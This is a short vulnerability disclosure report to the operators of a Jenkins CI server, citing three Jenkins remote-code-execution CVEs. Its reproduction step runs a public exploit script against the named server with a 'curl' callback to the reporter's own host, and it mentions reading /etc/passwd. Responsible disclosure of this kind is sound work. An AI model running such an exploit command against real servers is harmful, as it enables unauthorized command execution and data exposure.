Dear Sir/Madam, While Searching Jenkins Dashboard I discovered that this domain (https://ci.pycqa.org/) vulnerable to this CVEs (CVE-2018-1000861, CVE-2019-1003005 and CVE-2019-1003029) allow attacker can execute arbitrary command commands on a target operating system. Steps To Reproduce: Download the exploit (https://github.com/orangetw/awesome-jenkins-rce-2019) and issue the command below: python2.7 exp.py https://ci.pycqa.org/ "curl myserver.ip/oob/" Then I check my server to verify that command executed.(see attached images for POC about content of /etc/passwd file ) Best regards, -j3ssie-